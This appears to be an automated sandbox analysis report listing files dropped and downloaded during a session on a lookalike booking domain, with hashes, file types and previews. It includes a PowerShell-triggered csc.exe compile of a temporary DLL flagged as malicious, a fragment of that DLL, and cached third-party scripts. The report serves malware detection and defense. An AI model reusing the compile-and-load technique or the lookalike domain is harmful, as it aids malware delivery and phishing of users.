                                                                                                                                                                                                                        SHA1:A1D211E163DB15DCB96119AEBDC72992F883C837
                                                                                                                                                                                                                        SHA-256:CC17644435C926B0B5B3554E9EF5DBF75181F8256D21CCFF64BA36545B5A02DD
                                                                                                                                                                                                                        SHA-512:E2F0B9548F00F82107A6F31633506B2D12E3C42FAD8E5419D01E58E4DF05226D3F51384F0466B68CF96B0E5A8E90DA2ABF0B845613CB28A8F47D4A16ECD1F313
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\toaudqqy.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\toaudqqy.0.cs"

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\toaudqqy.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):8704
                                                                                                                                                                                                                        Entropy (8bit):4.523940267980384
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:52EDBB6DF296F754078CE2C6CA87C760
                                                                                                                                                                                                                        SHA1:CC4334FB822C9DC3CE82B53DFE62312A3265FACF
                                                                                                                                                                                                                        SHA-256:029FA9C45CA5F2D67C4A8E6AD518A9C3F46D75901A411A1995E3669491CEFCBF
                                                                                                                                                                                                                        SHA-512:F7191F9AF4A0E4AD6A061C720D61C13B6ED1E9238028698DA74CC6BD4893EBE4AB731F2ABCC78FB49270BCDF860F9570194A9865AF9682A4EF013BDC4AF84F21
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................8... ...@....... ....................................@..................................8..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................8......H........$...............................................................0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0............8.............................(....(....(....}....~.....~....~....~..... ....~.........o,...-.s....z..<(..........4X(...... .............. .....(.....3.~......{......o....-!s....z~......{......o....-.s....z...)......~......{.......X..

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\toaudqqy.out

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                        Size (bytes):685
                                                                                                                                                                                                                        Entropy (8bit):5.231008344503757
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:187C1CDAE097A01CC3645096A6205511
                                                                                                                                                                                                                        SHA1:F5F42680039E2AEC1C202F9408AED07CD8F7C852
                                                                                                                                                                                                                        SHA-256:9207ABCC751252AE55B058A15EBD4D8AE7D91D11399282758FC186588719FBE8
                                                                                                                                                                                                                        SHA-512:52BA91D30E867BE5FA0C6DBC14D8D7F49E407022684ABB352B499834E27E69D8EDFAE38EF7F9095AC9B85F9508338AF59ED7710D225400DCA93AD9D27F8B277B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\toaudqqy.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\toaudqqy.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):0
                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:319E93DDE7A8875B922283D288402CA5
                                                                                                                                                                                                                        SHA1:B2BFD5D37D0CED163666E3AD6BD22274391B806E
                                                                                                                                                                                                                        SHA-256:8877B37E866CA9C3AD8CDA8E03ACDED9EACEAD49A041004158AC39AF11678A1B
                                                                                                                                                                                                                        SHA-512:52D036B3763C14B97318A05C149823290338B729DA7E394477BEA6FDF2FAE7183568F02BC6DF8B570C5A1ECED89F24679B3923ECFC4179B66954F701652FD7DA
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:...................................FL..................F.".. ......9.....(....z.:{.............................:..DG..Yr?.D..U..k0.&...&......&..9.....C......1........t...CFSF..1.....FWtM..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FWtM|ZcS.....Y.....................?@.A.p.p.D.a.t.a...B.V.1.....|ZjS..Roaming.@......FWtM|ZjS.....Y....................G.&.R.o.a.m.i.n.g.....\.1.....|ZfS..MICROS~1..D......FWtM|ZoS.....Y.....................4..M.i.c.r.o.s.o.f.t.....V.1.....gZ.J..Windows.@......FWtM|ZcS.....Z........................W.i.n.d.o.w.s.......1.....FWvM..STARTM~1..n......FWtM|ZcS.....Z..............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....FWnN..Programs..j......FWtM|ZcS.....Z..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FWtMgZyJ.....Z....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FWtM|Z.S....PZ..........

                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\V5ZDOMIMA6FHY3XSITDO.temp

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):6222
                                                                                                                                                                                                                        Entropy (8bit):3.7201706192434236
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:319E93DDE7A8875B922283D288402CA5
                                                                                                                                                                                                                        SHA1:B2BFD5D37D0CED163666E3AD6BD22274391B806E
                                                                                                                                                                                                                        SHA-256:8877B37E866CA9C3AD8CDA8E03ACDED9EACEAD49A041004158AC39AF11678A1B
                                                                                                                                                                                                                        SHA-512:52D036B3763C14B97318A05C149823290338B729DA7E394477BEA6FDF2FAE7183568F02BC6DF8B570C5A1ECED89F24679B3923ECFC4179B66954F701652FD7DA
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:...................................FL..................F.".. ......9.....(....z.:{.............................:..DG..Yr?.D..U..k0.&...&......&..9.....C......1........t...CFSF..1.....FWtM..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FWtM|ZcS.....Y.....................?@.A.p.p.D.a.t.a...B.V.1.....|ZjS..Roaming.@......FWtM|ZjS.....Y....................G.&.R.o.a.m.i.n.g.....\.1.....|ZfS..MICROS~1..D......FWtM|ZoS.....Y.....................4..M.i.c.r.o.s.o.f.t.....V.1.....gZ.J..Windows.@......FWtM|ZcS.....Z........................W.i.n.d.o.w.s.......1.....FWvM..STARTM~1..n......FWtM|ZcS.....Z..............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....FWnN..Programs..j......FWtM|ZcS.....Z..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FWtMgZyJ.....Z....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FWtM|Z.S....PZ..........

                                                                                                                                                                                                                        Chrome Cache Entry: 80

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (7002)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):8833
                                                                                                                                                                                                                        Entropy (8bit):5.4976151392899375
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:892B75BF33DA3C91B96FE0FD747C239F
                                                                                                                                                                                                                        SHA1:9D5D8DC8E83866B111EF4007D6149648145478B9
                                                                                                                                                                                                                        SHA-256:5E7F3E706AF7992596EEF3D665900C6CE8438C4654D6E6CC67B84CD01945F1EE
                                                                                                                                                                                                                        SHA-512:9211C162577C91DC005B15767A3189E9520CDB1CC9F2213CF98669D4A339FD9E9F6250B7337127FDBCDC24BEEB4DD7DD06E3442312969F0234E66B5FD4422EB2
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://zn3eum1ldyl0aih0i-partnersatbooking.siteintercept.qualtrics.com/SIE/?Q_ZID=ZN_3Eum1ldyL0aIh0i
                                                                                                                                                                                                                        Preview:(function () {. if (typeof window.QSI === 'undefined'){. window.QSI = {};. }.. var tempQSIConfig = {"hostedJSLocation":"https://siteintercept.qualtrics.com/dxjsmodule/","baseURL":"https://siteintercept.qualtrics.com","surveyTakingBaseURL":"https://s.qualtrics.com/spoke/all/jam","BrandTier":"RQqcwhV2J1","zoneId":"ZN_3Eum1ldyL0aIh0i"};.. // If QSI.config is defined in snippet, merge with QSIConfig from orchestrator-handler.. if (typeof window.QSI.config !== 'undefined' && typeof window.QSI.config === 'object') {. // This merges the user defined QSI.config with the handler defined QSIConfig. // If both objects have a property with the same name,. // then the second object property overwrites the first.. for (var attrname in tempQSIConfig) { window.QSI.config[attrname] = tempQSIConfig[attrname]; }. } else {. window.QSI.config = tempQSIConfig;. }.. window.QSI.shouldStripQueryParamsInQLoc = false;.})();../*@preserve.***Version

                                                                                                                                                                                                                        Chrome Cache Entry: 81

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):2228
                                                                                                                                                                                                                        Entropy (8bit):7.82817506159911
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                                                                                                                                                                        SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                                                                                                                                                                        SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                                                                                                                                                                        SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://www.gstatic.com/recaptcha/api2/logo_48.png
                                                                                                                                                                                                                        Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.

                                                                                                                                                                                                                        Chrome Cache Entry: 82

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):548
                                                                                                                                                                                                                        Entropy (8bit):4.688532577858027
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:370E16C3B7DBA286CFF055F93B9A94D8
                                                                                                                                                                                                                        SHA1:65F3537C3C798F7DA146C55AEF536F7B5D0CB943
                                                                                                                                                                                                                        SHA-256:D465172175D35D493FB1633E237700022BD849FA123164790B168B8318ACB090
                                                                                                                                                                                                                        SHA-512:75CD6A0AC7D6081D35140ABBEA018D1A2608DD936E2E21F61BF69E063F6FA16DD31C62392F5703D7A7C828EE3D4ECC838E73BFF029A98CED8986ACB5C8364966
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://booking.roombedsrewiews.com/static/OtAutoBlock.js
                                                                                                                                                                                                                        Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..

                                                                                                                                                                                                                        Chrome Cache Entry: 83

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (606)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):11374
                                                                                                                                                                                                                        Entropy (8bit):5.519922580947287
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:756F9116836F579D12BE8FE786B69D98
                                                                                                                                                                                                                        SHA1:51FF48AEEDDC311585DA9D749DB091900E9B9F02
                                                                                                                                                                                                                        SHA-256:DEA9DF0145848FFEB3C6931228D41E833341B4837C0E713D321C5BFCF6DCD4E6
                                                                                                                                                                                                                        SHA-512:6249596F8554AAEBB74B76EFE3138C1109CC87B2C72A4FFE0C1869EE77155A05C58F4B2D966BA38775C35A2B4451FF2581A22F8098ACF1377F6F0C15CB6C20B5
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://munchkin.marketo.net/164/munchkin.js
                                                                                                                                                                                                                        Preview:/*. * Copyright (c) 2007-2023, Marketo, Inc. All rights reserved.. * See https://developers.marketo.com/MunchkinLicense.pdf for license terms. * Marketo marketing automation web activity tracking script. * Version: 164 r924. */. (function(l){if(!l.MunchkinTracker){var h=l.document,p=h.location,C=encodeURIComponent,y=!1,q=null,t=null,D=!1,v=null,E=[],u=function(b,a,c,d){try{var e=function(){try{c.apply(this,arguments)}catch(a){}};b.addEventListener?b.addEventListener(a,e,d||!1):b.attachEvent&&b.attachEvent("on"+a,e);E.push([b,a,e,d])}catch(f){}},U=function(b,a,c,d){try{b.removeEventListener?b.removeEventListener(a,c,d||!1):b.detachEvent&&b.detachEvent("on"+a,c)}catch(e){}},e=function(b){return"undefined"!==typeof b&&null!==.b},F=function(b,a){return b.className.match(RegExp("(\\s|^)"+a+"(\\s|$)"))},V=e(l.XMLHttpRequest)&&e((new l.XMLHttpRequest).withCredentials),s=function(b){var a=null,c;if(e(b))if(0===b.length)a="";else try{a=decodeURIComponent(b)}catch(d){c=b.indexOf("?");if(-1!==c)t

                                                                                                                                                                                                                        Chrome Cache Entry: 84

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (521)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):1251
                                                                                                                                                                                                                        Entropy (8bit):5.433406739187698
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:0C131DE2A0D8F1BA69EAB7F6866C84DD
                                                                                                                                                                                                                        SHA1:362DB4E022D246B6A86C1A1C54E553C6D5F04ED6
                                                                                                                                                                                                                        SHA-256:081AD4206BFEB1950C8382B5BC32AAC31C4698598563D87080EE67A8FC5318D0
                                                                                                                                                                                                                        SHA-512:A8E0ADF432B95A438CA864D087830C697512675D2CA6E8D29225BBB36B8126F0B32E74CA264F40D0EEA34740D0618921E2B169857368DD1D725946AC55DECF73
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://munchkin.marketo.net/munchkin.js
                                                                                                                                                                                                                        Preview:/*. * Copyright (c) 2007-2023, Marketo, Inc. All rights reserved.. * See https://developers.marketo.com/MunchkinLicense.pdf for license terms. * Marketo marketing automation web activity tracking script. * Version: prod r946. */. (function(b){if(!b.Munchkin){var c=b.document,e=[],k,l={fallback:"164"},g=[],m=function(){if(!k){for(;0<e.length;){var f=e.shift();b.MunchkinTracker[f[0]].apply(b.MunchkinTracker,f[1])}k=!0}},n=function(f){var a=c.createElement("script"),b=c.getElementsByTagName("base")[0]||c.getElementsByTagName("script")[0];a.type="text/javascript";a.async=!0;a.src=f;a.onreadystatechange=function(){"complete"!==this.readyState&&"loaded"!==this.readyState||m()};a.onload=m;b.parentNode.insertBefore(a,b)},h={CLICK_LINK:"CLICK_LINK",.VISIT_WEB_PAGE:"visitWebPage",init:function(b){var a;a=l[b];if(!a&&0<g.length){a=b;var c=0,d;if(0!==a.length)for(d=0;d<a.length;d+=1)c+=a.charCodeAt(d);a=g[c%g.length]}a||(a=l.fallback);e.push(["init",arguments]);"150"===a?n("//munchkin-cdn.marketo.

                                                                                                                                                                                                                        Chrome Cache Entry: 86

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (64779)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):81484
                                                                                                                                                                                                                        Entropy (8bit):5.317084415140397
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:AD155B597A8C5A1556951905826E5A89
                                                                                                                                                                                                                        SHA1:157521878FC1D2F24916940B28BFE5D2D6FD07C6
                                                                                                                                                                                                                        SHA-256:1BE8A940EA6B760E87EAFCA7B0C3AD6CBBD239A5F5418EF755E2FDF122707CDF
                                                                                                                                                                                                                        SHA-512:01E460CDE1837F01F53D9C0B1761B2BF5080077F34B921A2A9A994678C43E44C6B8E1748AE0BC702DE20001512894904019426132004D881A85D636916D1061E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://siteintercept.qualtrics.com/dxjsmodule/8.7128e66c4069227926d7.chunk.js?Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web&Q_BRANDID=booking.roombedsrewiews.com
                                                                                                                                                                                                                        Preview:./*@preserve.***Version 2.27.0***.*/../*@license. * Copyright 2002 - 2018 Qualtrics, LLC.. * All rights reserved.. *. * Notice: All code, text, concepts, and other information herein (collectively, the. * "Materials") are the sole property of Qualtrics, LLC, except to the extent. * otherwise indicated. The Materials are proprietary to Qualtrics and are protected. * under all applicable laws, including copyright, patent (as applicable), trade. * secret, and contract law. Disclosure or reproduction of any Materials is strictly. * prohibited without the express prior written consent of an authorized signatory. * of Qualtrics. For disclosure requests, please contact notice@qualtrics.com.. */..try {. (window["WAFQualtricsWebpackJsonP-cloud-2.27.0"]=window["WAFQualtricsWebpackJsonP-cloud-2.27.0"]||[]).push([[8],{17:function(e,t,n){"use strict";n.d(t,"a",(function(){return i})),n.d(t,"e",(function(){return r})),n.d(t,"f",(function(){return

                                                                                                                                                                                                                        Chrome Cache Entry: 88

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):87533
                                                                                                                                                                                                                        Entropy (8bit):5.262536918435756
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:2C872DBE60F4BA70FB85356113D8B35E
                                                                                                                                                                                                                        SHA1:EE48592D1FFF952FCF06CE0B666ED4785493AFDC
                                                                                                                                                                                                                        SHA-256:FC9A93DD241F6B045CBFF0481CF4E1901BECD0E12FB45166A8F17F95823F0B1A
                                                                                                                                                                                                                        SHA-512:BF6089ED4698CB8270A8B0C8AD9508FF886A7A842278E98064D5C1790CA3A36D5D69D9F047EF196882554FC104DA2C88EB5395F1EE8CF0F3F6FF8869408350FE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://code.jquery.com/jquery-3.7.1.min.js
                                                                                                                                                                                                                        Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove

                                                                                                                                                                                                                        Chrome Cache Entry: 90

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (1238)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):1239
                                                                                                                                                                                                                        Entropy (8bit):5.068464054671174
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:9E8F56E8E1806253BA01A95CFC3D392C
                                                                                                                                                                                                                        SHA1:A8AF90D7482E1E99D03DE6BF88FED2315C5DD728
                                                                                                                                                                                                                        SHA-256:2595496FE48DF6FCF9B1BC57C29A744C121EB4DD11566466BC13D2E52E6BBCC8
                                                                                                                                                                                                                        SHA-512:63F0F6F94FBABADC3F774CCAA6A401696E8A7651A074BC077D214F91DA080B36714FD799EB40FED64154972008E34FC733D6EE314AC675727B37B58FFBEBEBEE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://booking.roombedsrewiews.com/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js
                                                                                                                                                                                                                        Preview:!function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,"&quot;")+'"></a>',d.childNodes[0].getAttribute("href")||""}function r(e,t){var r=e.substr(t,2);return parseInt(r,16)}function n(n,c){for(var o="",a=r(n,c),i=c+2;i<n.length;i+=2){var l=r(n,i)^a;o+=String.fromCharCode(l)}try{o=decodeURIComponent(escape(o))}catch(u){e(u)}return t(o)}function c(t){for(var r=t.querySelectorAll("a"),c=0;c<r.length;c++)try{var o=r[c],a=o.href.indexOf(l);a>-1&&(o.href="mailto:"+n(o.href,a+l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(var r=t.querySelectorAll("template"),n=0;n<r.length;n++)try{i(r[n].content)}catch(c){e(c)}}function i(t){try{c(t),o(t),a(t)}catch(r){e(r

                                                                                                                                                                                                                        Chrome Cache Entry: 91

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (64779)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):104629
                                                                                                                                                                                                                        Entropy (8bit):5.417643579841533
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:95C8526E7C18736CC0287A95E4BBABA6
                                                                                                                                                                                                                        SHA1:D9EADF6817099B29512CFA40B21DAD4EF760746D
                                                                                                                                                                                                                        SHA-256:CCA3D74F0BA1056F36CE157EDB8A9F95437B5D20991616589D2E3B1901B8EB65
                                                                                                                                                                                                                        SHA-512:B58EA0A382B25917D56051077F7D43C86104D9DEC32F75505E14EDF2D5C8B4229A0C44EFEA793131FF0F2D087482998EA0F4B54B7CD7FBF24AD03CE85D1DD393
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://siteintercept.qualtrics.com/dxjsmodule/CoreModule.js?Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web&Q_BRANDID=partnersatbooking
                                                                                                                                                                                                                        Preview:./*@preserve.***Version 2.27.0***.*/../*@license. * Copyright 2002 - 2018 Qualtrics, LLC.. * All rights reserved.. *. * Notice: All code, text, concepts, and other information herein (collectively, the. * "Materials") are the sole property of Qualtrics, LLC, except to the extent. * otherwise indicated. The Materials are proprietary to Qualtrics and are protected. * under all applicable laws, including copyright, patent (as applicable), trade. * secret, and contract law. Disclosure or reproduction of any Materials is strictly. * prohibited without the express prior written consent of an authorized signatory. * of Qualtrics. For disclosure requests, please contact notice@qualtrics.com.. */..try {. !function(e){var t={};function n(i){if(t[i])return t[i].exports;var r=t[i]={i:i,l:!1,exports:{}};return e[i].call(r.exports,r,r.exports,n),r.l=!0,r.exports}n.m=e,n.c=t,n.d=function(e,t,i){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,ge

                                                                                                                                                                                                                        Chrome Cache Entry: 93

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (34313)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):806001
                                                                                                                                                                                                                        Entropy (8bit):5.505058674190165
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:04D1F1D9CE7E0391F7D34D97128C8AB0
                                                                                                                                                                                                                        SHA1:4EE1B63773106FF15A81DCABAF1B54F05A3A4A80
                                                                                                                                                                                                                        SHA-256:313438105948E091A392E6DF9C4704ABD398ED4829C7A73E72FF2D69A2A97D08
                                                                                                                                                                                                                        SHA-512:7B7959EEBA111DFC83A7D429A23E653E780AFD95F221D05643055D6A178AE43F1EFC1CC0523F6DE334E384F238BC643FD10280D44371FB7D7359276A86164BC2
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtm.js?id=GTM-TGMJRCB
